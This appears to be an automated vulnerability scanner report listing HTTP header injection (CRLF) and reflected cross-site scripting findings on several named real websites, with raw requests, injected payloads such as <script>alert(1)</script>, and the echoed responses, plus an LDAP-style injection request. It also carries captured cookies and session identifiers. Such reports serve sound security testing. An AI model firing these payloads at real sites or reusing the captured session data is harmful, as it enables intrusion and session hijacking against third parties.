PBySeiMv5tPxl+djZ+dcINRGvl+lP6kcMRnn47vj3cfjHd39nYejtITweCzZb5u66wcpS/Xk7KYEh3eVG9zan3+YPd+9uDhznk+y7KDvV/nF/y6b4q2zH/d3+yE+Tt9ZRn813lDXJz/guR0OSXx+na7KOe/y6/3I642g/4RV3e4+hf8ZifzfPr2y3X7VZPXsAH5L/ixs+Zpfp4RgIvZr/Xr/P/erJ3PJtmn93Ym2zv53oPt/fN7O9sH9ML2wfnBw93dh+f5dHb+c2XWfucBsyY65Xf5dWa/y69rbNiPxPxHYn6D8fpdfv3f8JNf59f5XX6DX/fXV6P0u/xY/rskPzIQP+KcYc75XX7D/Hf5jcgO/Pr/v7cDn07uTw/u5w+3P93fube9v3cv2z7I84Pte3sHs8mnk4MHD/cf/FzZgd9l0A602bRdNz+yBD+S59vJc8cSJCfCQulXzY+MwY+Y55bG4Nf8zVit/aa/6W+T/IhffsQvm/jlF/zGx2Wb18uszZGa+HV/62+z+Up/YfrdoiyLbNGkz5+//AW/wdkiu8jJCfh1r++eF2Xe3OUPoJ3qqrw7m+xn+/mniNF2ptv7+e4OpXAfnG/fOz/IHu6ezz7Nz3fvPtg/uDc5eHhvO99/cLC9T29QDJfPts/3H2bU6sHsYHp+9yWZXbL3PEDp425ZXVRsf4m1yeL+iKt/jR9x9U1a8DceYOTf5Tf5df/AGANn+V5+/2Bvtr1DzuT2/oPzne2HBw8/JTdz5+DBvb37++RQfhAD//6ruli2jo07S0CyPvTbnLu/fSfeuvTq4/965BEUl3no6Vtn9FncGQ3887vOO/894Jt/5nvmr/Osns7ZZ/11TVc/cl1/JHfv57r+xj5Lkffa/eBHvuyPuOkWvuyv7avE3/S3+Y3+38w0N9L4R0zzs880v3H+u/wmYB2YRFkfcYazkxyzJvNR3GTSkstlQct2PWv5Wr7AmH6U2vkRc96OOTv28cde1vCtiL3INnp//Mgu/oiLbmEXf70f2UU8P2K
...[SNIP]...

Request 2

GET /professionals/uniGC.aspx?xpST=ProfessionalResults&LastName=7cce339ef57f7f63)!(sn=* HTTP/1.1
Host: www.hunton.com
Proxy-Connection: keep-alive
Referer: http://www.hunton.com/professionals/uniGC.aspx?xpST=ProfessionalResults&LastName=K
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=fwzgqujjzcm2lrafhxcipc55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; BIGipServerH1-HUNTON-A0910-80=1092146954.20480.0000; __utmz=267908375.1304742363.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sessionKey=8be6cff3-b698-403d-b33f-091ebc4e1304; SERVER_PORT=80; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; __utma=267908375.1939147739.1304742363.1304742363.1304742363.1; __utmc=267908375; __utmb=267908375.6.10.1304742363; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; DefaultCulture=en-US; Mode=1; EventingStatus=1; NavId=0; PortletId=0; SiteId=1837; ZoneId=0

Response 2

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 00:13:26 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 05
x-client: 000040
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-H1WS-A09
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1846; path=/
Set-Cookie: PortletId=5983402; path=/
Set-Cookie: SiteId=1837; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43390


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >


<head>
<tit
...[SNIP]...
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
...[SNIP]...

4. HTTP header injection  previous  next
There are 5 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


4.1. http://ad.doubleclick.net/adj/N5315.277603.HORSERACINGNATION/B5195285.2 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5315.277603.HORSERACINGNATION/B5195285.2

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 76cff%0d%0a99e4fb0fdd0 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /76cff%0d%0a99e4fb0fdd0/N5315.277603.HORSERACINGNATION/B5195285.2;sz=728x90;click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BwVjtPa7FTZ29OKX6lAfHuf3QArqb1eoBAAAAEAEg-MCvCzgAWJLgrJkZYMmGhYmIpIQQsgEZd3d3LmhvcnNlcmFjaW5nbmF0aW9uLmNvbboBCTcyOHg5MF9hc8gBCdoBOWh0dHA6Ly93d3cuaG9yc2VyYWNpbmduYXRpb24uY29tL3Byb2JhYmxlcy9wcm9iYWJsZXMuYXNweOABBMACAuACAOoCGVN0YWtlc1RyYWNrZXJCYW5uZXI3Mjh4OTD4AvDRHoADAZADpAOYA6QDqAMB4AQB&num=0&sig=AGiWqtwkE7_2jvvdMjZ4a1q1fw5Fzb0SsQ&client=ca-pub-4072016369212427&adurl=;ord=1647648825? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.horseracingnation.com/probables/probables.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/76cff
99e4fb0fdd0
/N5315.277603.HORSERACINGNATION/B5195285.2;sz=728x90;click=http: //adclick.g.doubleclick.net/aclk
Date: Sat, 07 May 2011 20:41:53 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

4.2. http://ad.doubleclick.net/adj/scmag.hmktus/sc.other [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/scmag.hmktus/sc.other

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 46fd5%0d%0a3cd3e079b91 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /46fd5%0d%0a3cd3e079b91/scmag.hmktus/sc.other;log=0;spr=0;sid=122;cc=us;pos=1501;tile=1;dcopt=ist;sz=640x480;ord=28877081349492070? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.scmagazineus.com/subscribe/section/122/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,1676624/667470/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/46fd5
3cd3e079b91
/scmag.hmktus/sc.other;log=0;spr=0;sid=122;cc=us;pos=1501;tile=1;dcopt=ist;sz=640x480;ord=28877081349492070:
Date: Fri, 06 May 2011 21:52:20 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

4.3. http://bidder.mathtag.com/iframe/notify [exch parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bidder.mathtag.com
Path:   /iframe/notify

Issue detail

The value of the exch request parameter is copied into the x-mm-debug response header. The payload 9e08b%0d%0a339589a3e58 was submitted in the exch parameter. This caused a response containing an injected HTTP header.

Request

GET /iframe/notify?exch=9e08b%0d%0a339589a3e58&id=5aW95q2jLzEvUTBGRlUwVkpOMEYwYjJoYVFVSXhkVlpSUjA5elRsaFZhMlJKL05HUmhZamRrTXpVdFlqRmtNaTA1TVRWaExXUXpZekF0T1dRMU4yWTVZelkyWWpBMy8yNTk4MDA4NjQ3OTY0NjMxNjgvMTE1MDAxLzEwMDQ3MC80L1EzQW1fQ25wZlFVZ053MjlWUjRoVHFRanRrZjdQTVgxMGl0NWY4QkN6VTAv/QtoXw1C_MI1GkQd8XEk8qAvcgpQ&price=TcWLQAACJL0K7F5J6ZFfBKa_thNHlk_C7IO8oA&dck=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBtnH9QIvFTb3JCMm8sQeEvsXMDtzvj_EBhpu-vBGkl4STEgAQARgBIAA4AVCAx-HEBGDJhoWJiKSEEIIBF2NhLXB1Yi02NTQ3MDc0MDM1ODk5OTE2oAHg6pnsA7IBDnd3dy50YWdnZWQuY29tugEKMTYweDYwMF9hc8gBCdoBIWh0dHA6Ly93d3cudGFnZ2VkLmNvbS9icm93c2UuaHRtbJgClArAAgTIAtbBjA6oAwHoA-kJ6ANx6AMO6AOkBPUDAACAhIAG3LXNhPKEoZOvAQ%26num%3D1%26sig%3DAGiWqtwZBHxjkNZbavrUkj1D5wqU_jUTrQ%26client%3Dca-pub-6547074035899916%26adurl%3D HTTP/1.1
Host: bidder.mathtag.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6547074035899916&format=160x600_as&output=html&h=600&w=160&channel=3193443288&ad_type=text_image&ea=0&alternate_ad_url=http%3A%2F%2Fwww.tagged.com%2Fad_redirect_160.html&flash=10.2.154&url=http%3A%2F%2Fwww.tagged.com%2Fbrowse.html&dt=1304809868551&bpp=3&shv=r20110427&jsv=r20110427&correlator=1304809868555&frm=1&adk=1240161899&ga_vid=423697314.1304809869&ga_sid=1304809869&ga_hid=1080768516&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=-12245933&bih=-12245933&ifk=4071748756&fu=0&ifi=1&dtd=7
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; mt_mop=4:1304360412; ts=1304767503

Response

HTTP/1.1 404 Not found
Date: Sat, 07 May 2011 18:11:43 GMT
Server: MMBD/3.5.5
Content-Type: text/html; charset=utf-8
Content-Length: 18
x-mm-debug: exchange not found - 9e08b
339589a3e58

x-mm-host: ewr-bidder-x1
Connection: keep-alive

Request not found

4.4. http://d.xp1.ru4.com/activity [redirect parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d.xp1.ru4.com
Path:   /activity

Issue detail

The value of the redirect request parameter is copied into the Location response header. The payload 65753%0d%0abe7cf5083b was submitted in the redirect parameter. This caused a response containing an injected HTTP header.

Request

GET /activity?_o=62795&_t=cm_bk&redirect=65753%0d%0abe7cf5083b HTTP/1.1
Host: d.xp1.ru4.com
Proxy-Connection: keep-alive
Referer: http://tags.bluekai.com/site/2576?ret=html&phint=u=80312807C795402E93C5016D2A2A3E1B&phint=ord=7169916033744.81
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X1ID=AM-00000000030620452; O1807966=16; P1807966=c3N2X2MyfFl8MTMwNDM2MDM2MHxzc3ZfYnxjMnwxMzA0MzYwMzYwfHNzdl8xfDI4NTQ0NTQ3M3wxMzA0MzYwMzYwfA==

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun-Java-System-Web-Server/7.0
Date: Fri, 06 May 2011 22:33:42 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Pragma: no-cache
Set-cookie: O62795=0; domain=.ru4.com; path=/; expires=Mon, 01-Jan-1970 12:00:00 GMT
Location: http://65753
be7cf5083b

Content-length: 0
Connection: close


4.5. http://learn.bridgefront.com/sendpassword [replace0_ul_ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://learn.bridgefront.com
Path:   /sendpassword

Issue detail

The value of the replace0_ul_ request parameter is copied into the Location response header. The payload c78b2%0d%0ac733422f1d was submitted in the replace0_ul_ parameter. This caused a response containing an injected HTTP header.

Request

GET /sendpassword?button1=Get+Password&button2=Get+User+Name&forgetbrand=null&forwardpage=login.jsp&replace0_ul_=c78b2%0d%0ac733422f1d&replace1_ul_=3&totalvalues=3 HTTP/1.1
Host: learn.bridgefront.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=199010044.1303780600.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=199010044.1310163297.1303780600.1303780600.1303780600.1

Response

HTTP/1.1 302 Moved Temporarily
Date: Fri, 06 May 2011 23:00:19 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: JSESSIONID=7FF0975F91689439896F745E92A5D2C0; Path=/
Location: http://learn.bridgefront.com/forgetpassword.jsp?status=error&result=0&sendpasswordof=null&login=c78b2
c733422f1d
&email=3
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8


5. Cross-site scripting (reflected)  previous  next
There are 183 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


5.1. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [cid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The value of the cid request parameter is copied into the HTML document as plain text between tags. The payload c8274<script>alert(1)</script>5f83f56e00b was submitted in the cid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480c8274<script>alert(1)</script>5f83f56e00b&t=72&rv=&uid=&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://c5.zedo.com/jsc/c5/ff2.html?n=496;c=121;s=1;d=14;w=728;h=90;p=;q=index&t=6201
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; 480-SM=adver_05-02-2011-12-46-04; 480-VT=adver_05-05-2011-00-58-41_6458910271304557121ZZZZaol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-06-2011-11-08-35_990492871304680115; SERVERID=s3

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 18:10:48 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480c8274<script>alert(1)</script>5f83f56e00b-SM=adver_05-07-2011-18-10-48; expires=Tue, 10-May-2011 18:10:48 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480c8274<script>alert(1)</script>5f83f56e00b-VT=adver_05-07-2011-18-10-48_93973011304791848; expires=Thu, 05-May-2016 18:10:48 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480c8274<script>alert(1)</script>5f83f56e00b-nUID=adver_93973011304791848; expires=Sat, 07-May-2011 18:25:48 GMT; path=/; domain=c3metrics.com
Content-Length: 6697
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
ar.c3VJScollection[a]=new c3VTJSInter();this.C3VTcallVar.c3VJScollection[a].loadNewP();this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnid='adver';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScid='480c8274<script>alert(1)</script>5f83f56e00b';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuid='13014572191303613803';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnuid='93973011304791848';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv='72
...[SNIP]...

5.2. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The value of the id request parameter is copied into the HTML document as plain text between tags. The payload 6ad07<script>alert(1)</script>d54a737c557 was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=adver6ad07<script>alert(1)</script>d54a737c557&cid=480&t=72&rv=&uid=&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://c5.zedo.com/jsc/c5/ff2.html?n=496;c=121;s=1;d=14;w=728;h=90;p=;q=index&t=6201
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; 480-SM=adver_05-02-2011-12-46-04; 480-VT=adver_05-05-2011-00-58-41_6458910271304557121ZZZZaol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-06-2011-11-08-35_990492871304680115; SERVERID=s3

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 18:10:46 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_05-02-2011-12-46-04; expires=Tue, 10-May-2011 18:10:46 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=adver_05-05-2011-00-58-41_6458910271304557121ZZZZaol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-06-2011-11-08-35_990492871304680115ZZZZadver6ad07%3Cscript%3Ealert%281%29%3C%2Fscript%3Ed54a737c557_05-07-2011-18-10-46_15826757881304791846; expires=Thu, 05-May-2016 18:10:46 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adver6ad07%3Cscript%3Ealert%281%29%3C%2Fscript%3Ed54a737c557_15826757881304791846; expires=Sat, 07-May-2011 18:25:46 GMT; path=/; domain=c3metrics.com
Content-Length: 6700
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
